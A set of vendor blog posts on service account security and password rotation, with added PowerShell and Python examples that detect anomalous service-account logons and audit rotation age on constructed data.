Service accounts play an important role in today's enterprise environment. These non-human, or machine-to-machine (M2M), accounts are used by applications, systems, and services to perform automated tasks on a network. They need access to resources such as databases and file shares to perform their routine tasks, and because of their central role they often have privileged access so that they can carry out their functions without human interaction. If not properly managed, however, service accounts pose significant risks: a threat actor holding a service account's compromised credentials can take it over and move laterally throughout a network undetected. In this post, we'll explore what service accounts are and how they're used, and explain the security risks organizations face if they're not managed correctly. This is the first part of a three-post series on service account security.

What Service Accounts Are and Why They're Important

Service accounts are dedicated non-human accounts that IT admins create to run on different machines, or in some cases accounts that are created by a process such as a software installation. These accounts are usually defined in Active Directory (AD). Systems, applications, and administrators use service accounts to interact with other systems, for example a file manager or a SQL Server Agent. They perform automatic, repetitive, and scheduled actions in the background, usually without human intervention. Examples of the tasks service accounts perform include running an application on a Windows operating system, automated backups, and database maintenance. These machine accounts can be found across an organization's network.
Certain "hybrid" users, such as infrastructure administrators and application owners, may run scripts against machines from their personal user accounts and essentially act as service accounts. When a service account is created, it is typically given a set of permissions that allow it to perform specific tasks or access specific resources. In most cases these permissions are defined by the administrator who created the service account; where the account was created by a process, its permissions are configured by the installer of the software the service account will be connecting to.

Different Types of Service Accounts

There are usually several different types of service accounts in an environment, each with a specific role. In general, service accounts arise in two ways:

- Service accounts created by admins to automate specific tasks.
- Service accounts created during processes, for example during software installation.

Service accounts are usually categorized by their behavior and permission level. For organizations that have a large number of service accounts, this tends to be the mix:

- Machine to Machine (M2M) Accounts: used exclusively by machines to interact with other machines or services; for example, a web container communicating with a database container, or an application communicating with an endpoint.
- Hybrid Accounts: used primarily for M2M access but sometimes used by human users to access specific resources; for example, admin users who run scripts to access shared file servers, databases, or management systems.
- Scanners: used by a few devices to communicate with a large number of resources inside a network; for example, vulnerability scanners, health management scanners, and code scanners.

The Security Risks of Service Accounts

Service accounts are indispensable, but not immune to security risks.
In recent years, threat actors have increasingly leveraged compromised service accounts to gain unauthorized access and move laterally within an organization's network. Several factors contribute to the security risks associated with service accounts.

First, service accounts often lack visibility within an organization's security infrastructure. Because of their complex interdependencies with multiple processes, programs, and applications, it can be challenging to accurately track and monitor their behavior. This lack of visibility leaves service accounts open to compromise, with threat actors able to exploit them without detection.

Second, service accounts are frequently excluded from regular password rotation. Unlike human accounts, which require periodic password changes, service accounts are often overlooked in password management efforts, a key reason being the fear that changing a password will disrupt a critical process. Consequently, a compromised service account can give a threat actor prolonged, undetected access to an organization's network.

Lastly, service accounts are often provisioned with unnecessary access rights and privileges. It is common for developers and administrators to assign broad permissions to service accounts to ensure seamless functionality, neglecting the principle of least privilege. This increases the potential impact of a compromised service account, as threat actors can use the account's elevated privileges to reach sensitive systems and data.

Why It's Important to Understand the Security Risks of Service Accounts

Although service accounts perform important functions in an environment, they can also pose critical security risks if not managed correctly. When a service account is created, for example, it can be inadvertently assigned a level of privilege equivalent to that of an admin.
This, in turn, creates a security issue if admins do not have full visibility into the exact behavior and activity of those accounts. Often this is simply due to poor documentation of these accounts, which, as mentioned before, is a challenge because of their sheer number as well as issues like IT staff turnover. Over time the problem compounds, with the initial lack of awareness turning into a serious security blind spot. Here are some of the specific security risks organizations can face when managing service accounts:

Discovering All Service Accounts

One of the challenges of managing service accounts is discovering all the different service accounts that are in use. Since organizations can have hundreds or even thousands of service accounts, it can be a challenge to find every single service account and track its activity. If an organization is not aware of all its service accounts, it won't be able to secure them effectively.

Visibility and Monitoring

Because organizations often lack full visibility into service accounts and how they're being used, it is difficult to detect unauthorized access or malicious activity stemming from them. Complicating things is the fact that the identity infrastructure itself does not mark which accounts are service accounts: apart from the managed service account object classes, Active Directory has no attribute that distinguishes a service account from a human user's account. Additionally, because service accounts are not associated with a specific person, it can be difficult to determine their activity and purpose. This exposes organizations to security risks such as failing to detect unauthorized access by threat actors, which can lead to lateral movement attacks.

High Access Privileges

As stated previously, service accounts can often be assigned a level of privileged access similar to that of an admin. While the typical service account does not require domain-level access, these accounts sometimes end up overprivileged in the name of operational continuity.
Organizations that use service accounts to automate operational tasks assign high-privilege access to avoid any downtime in their operations. This makes it harder to protect these privileged accounts against identity-based attacks.

No PAM Protection: Password Rotation Is Not the Answer

To manage risk, most organizations rotate the passwords of highly privileged accounts. But password rotation has limits: a service account's password is often embedded in scripts and configuration files, so rotating it invalidates the stored password, prevents the service account from reaching its target resource, and breaks every process that depends on the account's task. For that reason service accounts are routinely excluded from rotation. Where the workload supports it, a group Managed Service Account (gMSA) lets AD rotate the password automatically and removes the embedded-password problem for that account, but many legacy applications and scripts cannot use one.

Mitigating Service Account Risks

To manage the potential exposures related to service accounts and address the concerns of cyber insurance underwriters, organizations can implement various risk mitigation practices. These practices include:

Auditing and Inventorying Service Accounts

Organizations should conduct regular audits to identify and inventory all service accounts within their network. This process involves determining the purpose and usage of each service account, as well as assessing the permissions and access rights associated with it. By maintaining an up-to-date inventory, organizations gain better visibility into their service accounts and can identify any accounts that are no longer in use.

Password Rotation and Complexity

Implementing a regular password rotation policy for service accounts is essential to enhance security. While changing passwords for service accounts can be challenging due to potential disruptions, organizations must strike a balance between security and operational continuity.
Ensuring that passwords are long and complex enough to resist brute-force and offline cracking attempts further strengthens service accounts' security.

Denying Interactive Logins

To prevent the unauthorized use of service accounts, configure the accounts so that they cannot log on interactively. In Active Directory this is done with the "Deny log on locally" and "Deny log on through Remote Desktop Services" user rights in Group Policy, leaving the account only the "Log on as a service" or network logon it actually needs. This restricts the use of service account credentials on ordinary human login screens and over RDP, and it turns any interactive logon by a service account into a reliable indicator of misuse. By implementing this measure, organizations limit threat actors' ability to abuse service accounts.

Privileged Access Management (PAM)

Implementing a Privileged Access Management (PAM) solution can significantly enhance service account security. PAM solutions provide a centralized platform for managing, securing, and monitoring privileged accounts, including service accounts. By enforcing the principle of least privilege, organizations can restrict service accounts to only the permissions required for their intended tasks.

Regular Review and Mitigation

Organizations should establish a process for regularly reviewing service account requirements and permissions. This review ensures that service accounts have only the necessary permissions and helps identify any potential security gaps or unnecessary access rights. By continuously assessing and mitigating risks, organizations can proactively address weaknesses in their service account management practices.

Monitoring and Alerting

Implementing robust monitoring and alerting mechanisms for service accounts is critical for detecting abnormal or malicious behavior. Organizations should establish monitoring rules specific to service accounts and configure their security operations centers (SOCs) to receive alerts in response to suspicious activities. Monitoring solutions powered by machine learning algorithms can help organizations establish baseline behaviors for service accounts (which sources they authenticate from, which destinations they reach, and when) and identify deviations that may indicate a compromise.
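The two controls just described, deny-interactive-logon and baseline monitoring, as an added PowerShell example that is not code from the original post or from Silverfort. Given an inventory of service accounts and a baseline of the source-to-destination pairs each one legitimately uses, it flags any interactive logon by a service account (which the deny-logon rights should make impossible, so a hit means either misuse or a gap in the policy) and any logon from a source or to a destination outside the baseline. The events below are constructed 4624 records; ConvertFrom-LogonEvent shows how to build the same shape from the live Security log. Account names, hostnames, addresses and the baseline are assumptions.

```powershell
# Added example (not code from the original post): detect interactive logons
# by service accounts and logons outside each account's baseline "fence",
# from Windows Security event 4624 records.

# Logon types in event 4624 that involve a console, RDP or cached session.
$InteractiveLogonTypes = @{ 2 = 'Interactive'; 7 = 'Unlock'; 10 = 'RemoteInteractive'; 11 = 'CachedInteractive' }

function ConvertFrom-LogonEvent {
    # Flatten a live 4624 EventRecord (from Get-WinEvent) into the fields used below.
    param([Parameter(Mandatory)] [System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    $xml  = [xml] $Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        TimeCreated    = $Event.TimeCreated
        Computer       = $xml.Event.System.Computer      # the destination host
        TargetUserName = $data['TargetUserName']
        LogonType      = [int] $data['LogonType']
        IpAddress      = $data['IpAddress']              # the source
    }
}

function Test-ServiceAccountLogon {
    param(
        [Parameter(Mandatory)] $Events,                  # objects with the fields above
        [Parameter(Mandatory)] [hashtable] $Baseline     # account -> list of "source->destination"
    )
    foreach ($e in $Events) {
        # Only inventoried service accounts are subject to these rules.
        if (-not $Baseline.ContainsKey($e.TargetUserName)) { continue }
        $type = [int] $e.LogonType
        $pair = "$($e.IpAddress)->$($e.Computer)"

        if ($InteractiveLogonTypes.ContainsKey($type)) {
            [pscustomobject]@{ Severity = 'High'; Account = $e.TargetUserName; Rule = 'interactive logon by service account'
                               Detail = "$($InteractiveLogonTypes[$type]) logon on $($e.Computer) from $($e.IpAddress)" }
        }
        if ($Baseline[$e.TargetUserName] -notcontains $pair) {
            [pscustomobject]@{ Severity = 'Medium'; Account = $e.TargetUserName; Rule = 'outside baseline fence'
                               Detail = "$pair not in baseline: $($Baseline[$e.TargetUserName] -join ', ')" }
        }
    }
}

# Constructed baseline (in practice, learned during the discovery and monitoring phase).
$baseline = @{
    'svc_backup' = @('10.0.1.15->FS01')
    'svc_sql'    = @('10.0.2.8->DB01', '10.0.2.9->DB01')
}
# Constructed sample events in the shape ConvertFrom-LogonEvent produces.
$events = @(
    [pscustomobject]@{ TimeCreated = '2024-03-01T02:00:11'; Computer = 'FS01';  TargetUserName = 'svc_backup'; LogonType = 5;  IpAddress = '10.0.1.15' } # service logon, inside fence
    [pscustomobject]@{ TimeCreated = '2024-03-01T02:05:40'; Computer = 'DB01';  TargetUserName = 'svc_sql';    LogonType = 3;  IpAddress = '10.0.2.8'  } # network logon, inside fence
    [pscustomobject]@{ TimeCreated = '2024-03-01T09:12:03'; Computer = 'WS042'; TargetUserName = 'svc_sql';    LogonType = 10; IpAddress = '10.0.9.77' } # RDP with service creds
    [pscustomobject]@{ TimeCreated = '2024-03-01T09:15:27'; Computer = 'DC01';  TargetUserName = 'svc_backup'; LogonType = 3;  IpAddress = '10.0.9.77' } # new source and destination
    [pscustomobject]@{ TimeCreated = '2024-03-01T09:16:00'; Computer = 'WS042'; TargetUserName = 'jdoe';       LogonType = 2;  IpAddress = '-'         } # human, out of scope
)
Test-ServiceAccountLogon -Events $events -Baseline $baseline | Format-Table -AutoSize

# Live use on a domain controller or a collector receiving forwarded Security logs:
#   $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents 5000 |
#           ForEach-Object { ConvertFrom-LogonEvent $_ }
#   Test-ServiceAccountLogon -Events $live -Baseline $baseline
```

The third sample event produces two findings (an RDP logon with service account credentials, and a source-to-destination pair outside svc_sql's fence), the fourth produces one, and the rest produce none. The source here is the IpAddress field of 4624 rather than WorkstationName, because the latter is supplied by the client and is trivially spoofable.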
Next Up: Analyzing Attacks Where Service Accounts Were Used

Now that we've covered the basics of service accounts, including what they're used for and the security risks they present, our next post will dive into several security breaches in which service accounts were used and, in some cases, became the threat actors' entry point.

---
- Published: 2023-05-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/service-accounts-security-best-practices/

Managing service accounts can be a daunting task, as they are scattered across different environments, used by various business applications, and typically forgotten and left unsupervised: in most organizations nobody is tracking their use or validating that they have not been compromised or abused by malicious actors. On top of this, organizations often lack full visibility into service accounts and how they're being used, which makes these accounts low-hanging fruit for threat actors. Service account management is nonetheless a critical task that should not be overlooked, because service accounts often have privileged access and are used by applications, scripts, and services to authenticate to and interact with various systems and resources. If it is overlooked, malicious actors who have compromised a service account can carry out activities such as lateral movement. In this post, we will explain how Silverfort enables you to manage your service accounts easily through automated detection, monitoring, and protection, providing full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation.
Best Practices for Service Accounts Protection

While service accounts can be associated with an owner and their activity should be continuously monitored, they should not have the same privileges as a regular user account: service accounts should not have interactive logon rights or the ability to operate as normal users. By implementing Silverfort's Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach:

1. Discover all service accounts
2. Monitor activity and risk analysis
3. Analyze and enable access policies

With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort's three-step approach:

1. Discovery

The first step to properly managing and protecting all service accounts is knowing exactly where they reside. Here are several key questions to ask:

- What service accounts do you have?
- What is the total number of service accounts?
- Which assets use those service accounts?

Silverfort's Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info.

This is done when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically.
Silverfort identifies and categorizes three main types of service accounts:

- Machine to Machine (M2M) Accounts: defined in Active Directory (AD) or another user repository
- Hybrid Accounts: used by both users and machines
- Scanners: used by a few devices to communicate with a large number of resources inside a network

Silverfort can also quickly identify any accounts that follow common service account naming conventions (e.g. "admin" or "svc"), as well as any custom naming conventions used by the organization. Because Silverfort detects machine-like behavioral patterns, it can also flag an account that is additionally being used by a human user and alert on this bad practice: it detects the erratic patterns of human activity that do not correlate with the machine's behavior and alerts on the irregular activity of the service account.

2. Monitoring & Risk Analysis

The next, and continuous, phase is monitoring all service account activity and the associated risks. With a complete picture and full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use.

Silverfort's Investigation screen shows various insights into a specific service account's activity.

Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, and so on. Silverfort then adds a risk analysis and a level of predictability to each service account so that administrators can better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect suspicious behavior or anomalies, providing SOC teams with actionable insights into overall service account activity.
The importance of monitoring and auditing Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches. Active Monitoring and Anomaly Detection Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns. This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real-time, enabling them to respond promptly to potential threats. Auditing and Authentication Monitoring The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts. Visibility and Auditing Challenges Managing service accounts comes with numerous visibility and auditing challenges. Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts. Dormant and Forgotten Service Accounts One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or the employee who created them has left the organization. 
These dormant accounts pose a serious security risk, as they can be exploited by malicious actors to gain unauthorized access to the system. Therefore, it's important to regularly audit service accounts and deactivate any that are no longer needed.

Sharing of Service Account Credentials

Sharing one set of credentials across several services may seem convenient, but it significantly increases the risk of a security breach. If the credentials are compromised, every service using them becomes vulnerable. To mitigate this risk, each service should have its own dedicated service account with unique credentials.

3. Analyze & Access Policies

Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies that provide a digital fence for these non-human accounts.

Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications).

Silverfort enables admins to analyze their service accounts' insights to identify specific service account behaviors. Silverfort shows the number of hits per source and destination, which helps admins prioritize the sources and destinations their service accounts connect to and ensure they are properly monitored and protected. With the help of Silverfort, admins can examine service account behavior using one of the following methods:

1. Identify which accounts are used by the crown-jewel applications and analyze those service accounts first.
2. Analyze the accounts at the critical risk level (as rated by Silverfort), then work down through the lower risk levels.
3. Analyze and prioritize the service accounts with high privileges, then the accounts that are broadly used, and finish with accounts that have interactive logins.

After analyzing the service accounts, Silverfort automatically recommends specifically tailored policies for each service account.
Each recommended policy is initially designed to lower the network's risk level without blocking traffic: it tracks policy violations in a monitor-only mode, so the admin can confirm that the policy covers the account's legitimate traffic before it is enforced. Silverfort has three types of authentication policies for service accounts:

- Block access
- Alert to SIEM
- Alert

For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when the policy should be applied, and what action the system should take in case of a deviation. In an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts, using Silverfort's recommended policies. Once policies have been created for all service accounts, admins can simply enable them and have them enforced automatically, without changing applications, changing passwords, or deploying proxies. With complete visibility into these accounts and the ability to proactively protect them with access policies, organizations are well equipped to reduce the attack surface presented by compromised service accounts.

Creating and Implementing Policies

Companies should standardize the creation of service accounts in accordance with their security policies. This includes defining which organizational resources the service accounts should be assigned to, and any other Active Directory (AD) attributes required. A workflow for requesting service account creation and the proper approval steps should be established, along with a process for assigning ownership of the account.

Managing and Rotating Service Account Credentials

Proper management of service account credentials is essential to maintaining their security.
This involves regularly rotating the passwords of service accounts and ensuring that they are stored securely. The use of automated solutions can greatly simplify this process and eliminate the possibility of human error. Manual vs Automated Management While manual management of service account credentials is possible, it is extremely time-consuming and prone to errors. On the other hand, automated management solutions provide a more efficient and reliable way of handling service account credentials. These tools can automatically generate strong passwords, rotate them periodically, and store them securely, reducing the risk of unauthorized access. Risks of Credential Reuse Reusing the same credentials across multiple service accounts significantly increases the risk of a security breach. If one account gets compromised, all other accounts with the same credentials become vulnerable. Therefore, each service account should have unique credentials, and these should be regularly changed to minimize the risk of a breach. Ensuring Accountability and Oversight Accountability and oversight are critical aspects of service account management. This involves assigning ownership of each service account to a specific individual or team within the organization. The owner is responsible for the management and security of the account, including approving any changes to the account settings and monitoring its activity. This level of accountability helps to maintain control over service accounts and ensures that any suspicious activity is quickly identified and addressed. Challenges of Service Account Management Even though service accounts are essential for the proper functioning of numerous applications and services, managing them presents several challenges. One of the main issues is the difficulty in determining their activity and purpose when they are not associated with a specific individual. 
Lack of visibility into these accounts may expose organizations to security risks, including unauthorized access by threat actors, resulting in lateral movement attacks. Service account management generally faces the following challenges:

- The lack of standardized policies and procedures for creating and implementing service accounts: Without clear policies, organizations may struggle to define which resources service accounts should be assigned to and what attributes are required. This leads to confusion and inconsistency in managing service accounts.
- Difficulty in centralized provisioning: Managing service accounts becomes more complex when the process is not centralized. Centralization simplifies management, reduces unauthorized access, and ensures that only authorized personnel can create, modify, and delete service accounts, which avoids service account sprawl.
- Can't rotate service account passwords: Password rotation is impractical for high-privilege service accounts, because these accounts are typically used by scripts that store their login credentials, and rotating the password breaks the script.
- Credential reuse risks: Credential...

---
- Published: 2023-04-21
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/five-reasons-why-silverfort-is-the-ultimate-first-step-on-your-zero-trust-journey/

Zero Trust has traditionally been thought of in the context of a network, with implementation considered a project primarily focused on upgrading and segmenting legacy infrastructure. As long as access to all physical assets was controlled, the thinking went, that could act as a proxy for extending trust, in the form of access, to users. But this paradigm has proven to be flawed, especially with the dissolution of the traditional perimeter and the resulting surge in users accessing resources from outside an organization's network.
Because access to resources is based on user authentication, the natural place to begin a Zero Trust journey is with identity. But with identity-based attacks such as credential-driven ransomware increasing, the problem is figuring out exactly where to begin, including how existing security products can contribute and what role PAM products and MFA solutions should play. In this post, we'll suggest five reasons why the Silverfort Unified Identity Protection platform can provide the ideal first step in evolving an identity-focused Zero Trust initiative from an abstract vision into a concrete reality.

Reason #1: Silverfort Can Provide Centralized Visibility Into Every Authentication and Access Request

Because most organizations today operate a hybrid environment, there is usually one set of identity providers managing cloud resources (SaaS apps, cloud workloads, etc.) and others that manage on-prem assets such as servers, workstations, and legacy apps. In some cases there are additional products involved in identity and access management, such as Privileged Access Management (PAM) solutions. The result is that user activity is widely distributed across many different areas, with no easy way to gather all of this data into one central spot. Further complicating things is the issue of user type, since standard users, privileged users, third-party users, and non-human users (also called machine-to-machine accounts or service accounts) each come with unique challenges around visibility and monitoring. Silverfort solves this challenge because it has native integrations with every identity provider, enabling it to log every authentication request happening in an environment and thus provide a unified view of all network activity across every user and any resource.
### Reason #2: Silverfort Can Determine Whether Every Access Attempt Is Benign or Malicious

Ideally, organizations would have a complete view of all user behavior and be able to evaluate the context of every request before granting access. This could be done by using risk analysis in combination with identity verification to decide whether each request was legitimate or actually coming from an adversary using compromised credentials. But the fragmented nature of the hybrid environment makes the gathering and processing of all data associated with authentication and access requests a serious obstacle. There is also the challenge of normalizing the different risk scores being generated by various engines, as well as the fact that there are very few solutions available that can analyze the actual authentication packets themselves in order to detect any anomalies.

Silverfort solves this issue because of its ability to see all network activity, which means it can evaluate the full context of every authentication. With that amount of information, Silverfort can build a highly sophisticated risk analysis engine to determine the legitimacy of every single authentication happening within the environment.

### Reason #3: Silverfort Can Block Malicious Access in Real Time

If an access request can’t be trusted, it should be blocked. Specifically, this blocking should happen in real time as a result of secure access controls triggered by a policy that spans every type of user, access interface, and resource. However, this is no easy task, especially for on-prem resources. This is because the main authentication protocols (Kerberos and NTLM) used by Active Directory (AD) do not actually support MFA. As a result, there is no way to enforce real-time protection on the resources that AD manages (which include legacy applications, file shares, and command-line interfaces).
But Silverfort has the ability to actively enforce policies on these resources due to its ability to see all authentications taking place in AD. With the platform’s own MFA capabilities, as well as its integrations with every third-party MFA provider on the market (including Okta, Duo, Ping, Microsoft Authenticator, HYPR, Yubico, and RSA), Silverfort can block any malicious access request in real time.

### Reason #4: Silverfort Can Apply Context and Enforcement to Every Resource

To fully implement an Identity Zero Trust framework, organizations would need the ability to apply sophisticated risk analysis and take enforcement action on each level of access to every single resource. This would mean, for example, being able to apply policies to each one of the resources within a network segment, rather than just at the gateway. Having this ability would give IT teams the ability to make much better decisions on how best to protect enterprise resources from compromise or inappropriate access, while also taking into account other key factors like productivity and user experience. Because Silverfort integrates with every product in the security stack – including all SIEM tools, EDR/XDR solutions, and SOAR software – access enforcement policies can be finely tuned and adjusted on a granular level for each resource.

### Reason #5: Silverfort Offers Rapid Deployment and Immediate Time to Value

Perhaps the biggest challenge in implementing Zero Trust is finding solutions that can be implemented quickly and return value to the organization right away. PAM solutions provide an important security layer that includes the monitoring of admin connections (via session recording) and a prevention layer in the form of a vault for admin credentials and the rotation of their passwords. However, PAM programs are known to have lengthy and complex deployments, often stretching over months and even years.
Silverfort’s solution, on the other hand, can be rolled out very quickly, with most deployments taking less than 30 days. This means organizations can see real value right away; for example, through protecting all service accounts. Because Silverfort can see all authentications in the environment, it can discover any machine-to-machine accounts due to their highly predictable behavior. Silverfort can then automatically create policies to protect these (often highly privileged) accounts from compromise. This discovery and protection of service accounts is one of the biggest hurdles to a successful PAM implementation.

### Learn More About Silverfort Unified Identity Protection

Silverfort’s solution features an innovative agentless and proxyless technology that runs in the backend of an existing IAM infrastructure to stop identity threats in real time. This means organizations can now confidently implement an identity-focused Zero Trust approach through the protection of the areas most often targeted by threat actors in data breaches and ransomware attacks — legacy systems, command-line interfaces, and service accounts. Interested in seeing how Silverfort can accelerate your Identity Zero Trust journey? Request a demo here.

---

- Published: 2023-04-11
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/rotating-service-account-passwords/

Regularly rotating service account passwords is a critical cyber security best practice, yet it remains an often overlooked process in many organizations. Service accounts provide broad access and control, so if compromised they pose a serious threat. For IT managers and cyber security professionals, implementing a mandatory service account password rotation policy and procedure is a straightforward way to shrink an organization's attack surface and strengthen its security posture overall. Though a basic practice, when deployed properly password rotation can serve as an effective safeguard against unauthorized access and data theft.
### Understanding Service Accounts and Their Vulnerabilities

Service accounts provide automated access for applications, software, and IT systems. However, their broad permissions also make them an attractive target for cybercriminals. If compromised, service accounts can grant attackers sweeping control and access. To reduce risks, organizations must implement strong, multi-factor authentication and regularly rotate service account passwords. Failing to do so provides a window of opportunity for unauthorized access. Studies show that stolen or cracked passwords are a leading cause of data breaches.

Rotating passwords entails changing service account credentials periodically, such as every 90 days. This limits the usefulness of any compromised passwords and forces attackers to continually work to maintain access. When rotating passwords, IT teams should generate highly complex, random passwords containing a minimum of 16 characters, including a mix of letters, numbers and symbols. Simply changing default passwords is insufficient. Attackers can easily guess commonly used passwords or access them through social engineering. Highly complex, frequently rotated passwords are exponentially more difficult to crack. They significantly reduce the risk that a compromised service account goes undetected, with attackers operating freely in the network.

### The Risks of Static Passwords for Service Accounts

Service account passwords that remain static for long periods of time pose serious risks. Regular password rotation is critical for mitigating threats and protecting systems.

#### Lack of Rotation Invites Targeting

If cybercriminals identify a service account with a static password, they can focus efforts on compromising that account. Rotating passwords regularly makes accounts less susceptible to brute force attacks and more difficult for malicious actors to access.

#### Increased Attack Surface

Rotating service account passwords also decreases the overall attack surface.
The longer a password remains static, the more time adversaries have to employ brute force guessing or reuse compromised credentials across systems and accounts. Routine password changes force malicious actors to restart the guessing process, making password cracking attempts more difficult and time-consuming.

#### Static Passwords Enable Lateral Movement

Once inside a system, attackers often move laterally to access additional accounts and resources. Service accounts with unchanging passwords are easy targets, allowing adversaries to spread throughout the network. Frequently changing service account credentials restricts an intruder's ability to access critical systems and data.

#### Compliance Requirements Mandate Rotation

Many industry standards, including PCI DSS, HIPAA, and NIST 800-53, require that service account passwords be rotated periodically based on risk levels. Failure to rotate passwords for service accounts can result in policy violations and compliance failures, damaging an organization's reputation and credibility.

### Implementing Password Rotation Strategies

Automated password rotation strategies offer significant benefits over manual rotation. Automation ensures password changes occur as scheduled without relying on human intervention. This reduces the risk of passwords expiring or remaining static for extended periods.

#### Frequency

For service accounts, industry experts recommend rotating passwords every 30 to 90 days. More frequent rotation, every 30 days, provides maximum security but requires additional overhead to implement and maintain. Less frequent rotation, every 90 days, reduces workload but may increase vulnerability. Organizations should evaluate their risk tolerance and security requirements to determine an optimal rotation frequency.

#### Implementation

To implement automated password rotation, organizations have two options:

1. Use native tools within operating systems and software.
Many systems like Windows Server and Oracle Database offer built-in password rotation functionality. However, native tools often lack robust reporting and auditing capabilities.

2. Deploy a third-party password rotation solution. These solutions provide a centralized console to manage password rotation across all systems and services. They offer strong encryption, detailed reports and audits, and integration with existing directory services. Solutions can rotate local account passwords, domain account passwords, and service account passwords across multiple platforms.

For service accounts, automated password rotation is a critical cybersecurity best practice. Native tools or third-party solutions enable organizations to rotate passwords regularly without significant manual effort. When selecting a solution, consider the frequency of rotation needed, reporting requirements, and the diversity of systems within the organization. With the right strategy and tools in place, automated password rotation can eliminate a key vulnerability and strengthen security posture.

#### Log and monitor rotation events

All password rotation events should be logged to provide an audit trail. Monitoring logs helps identify any issues with the rotation process and ensures passwords are being properly updated. Logging also gives administrators visibility into service accounts that may not be following the rotation schedule.

#### Test in a controlled environment first

Before deploying a password rotation strategy in a production environment, organizations should test it in a controlled setting. Testing helps work out any issues with the automation or logging of the rotation events. It also provides an opportunity to ensure all integrated systems continue functioning properly with the new passwords.

### Tools and Automation to Simplify Password Rotation

Tools and automation can simplify the process of rotating service account passwords.
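The frequency and logging guidance above can be turned into a small audit. The following Python script is an added example, not Silverfort's code or any tool named on this page: it takes a constructed inventory of service accounts with their last password-set time, a few constructed Security log lines in a simplified `timestamp event_id account` layout (the layout is my simplification; 4724 is the real Windows event ID for an account password reset), reports accounts outside a 90-day rotation window, flags inventory dates that no reset event corroborates, and generates a password meeting the 16-character mixed-class rule.

```python
"""Audit service-account password rotation against a policy window.

Added example; not Silverfort's code or any tool named on the page. The
account inventory and the Security log lines are constructed so it runs
offline; the log layout "timestamp event_id target_account" is a
simplification of mine, though 4724 is the real Windows event ID for an
account password reset.
"""
import re
import secrets
import string
from datetime import datetime, timedelta, timezone

ROTATION_DAYS = 90   # upper end of the 30-90 day window discussed above
MIN_LENGTH = 16      # minimum length the post recommends
REFERENCE_NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)  # constructed "today"

# Constructed inventory: account -> PasswordLastSet (UTC).
ACCOUNTS = {
    "svc-backup": datetime(2024, 1, 5, tzinfo=timezone.utc),
    "svc-sql": datetime(2023, 6, 1, tzinfo=timezone.utc),
    "svc-monitor": datetime(2024, 2, 20, tzinfo=timezone.utc),
}

# Constructed Security log extract. 4724 = password reset attempt,
# 4625 = failed logon (present to show non-rotation events are ignored).
EVENT_LOG = """\
2023-06-01T02:00:07Z 4724 svc-sql
2024-01-05T02:00:11Z 4724 svc-backup
2024-02-20T02:00:09Z 4625 svc-monitor
"""

_EVENT_RE = re.compile(r"^(\S+)\s+(\d{4})\s+(\S+)$")


def parse_reset_events(log_text):
    """Return {account: latest 4724 timestamp} from the log extract."""
    latest = {}
    for line in log_text.splitlines():
        m = _EVENT_RE.match(line.strip())
        if not m or m.group(2) != "4724":
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        account = m.group(3)
        if account not in latest or ts > latest[account]:
            latest[account] = ts
    return latest


def overdue_accounts(accounts, now, rotation_days=ROTATION_DAYS):
    """Accounts whose password is older than the rotation window."""
    cutoff = now - timedelta(days=rotation_days)
    return sorted(name for name, last_set in accounts.items() if last_set < cutoff)


def uncorroborated_rotations(accounts, reset_events):
    """Accounts whose inventory date has no matching 4724 event: a gap in
    the audit trail that the monitoring section says to investigate."""
    return sorted(
        name for name, last_set in accounts.items()
        if name not in reset_events or reset_events[name].date() != last_set.date()
    )


def meets_policy(password):
    """16+ characters with upper, lower, digit and symbol, per the post."""
    return (
        len(password) >= MIN_LENGTH
        and any(c.islower() for c in password)
        and any(c.isupper() for c in password)
        and any(c.isdigit() for c in password)
        and any(c in string.punctuation for c in password)
    )


def generate_password(length=MIN_LENGTH):
    """Random password from a CSPRNG that satisfies meets_policy()."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if meets_policy(candidate):
            return candidate


def run_audit(now=REFERENCE_NOW):
    """Bundle the checks so the report can be consumed programmatically."""
    return {
        "overdue": overdue_accounts(ACCOUNTS, now),
        "uncorroborated": uncorroborated_rotations(ACCOUNTS, parse_reset_events(EVENT_LOG)),
    }


if __name__ == "__main__":
    report = run_audit()
    print("Overdue for rotation:", report["overdue"])
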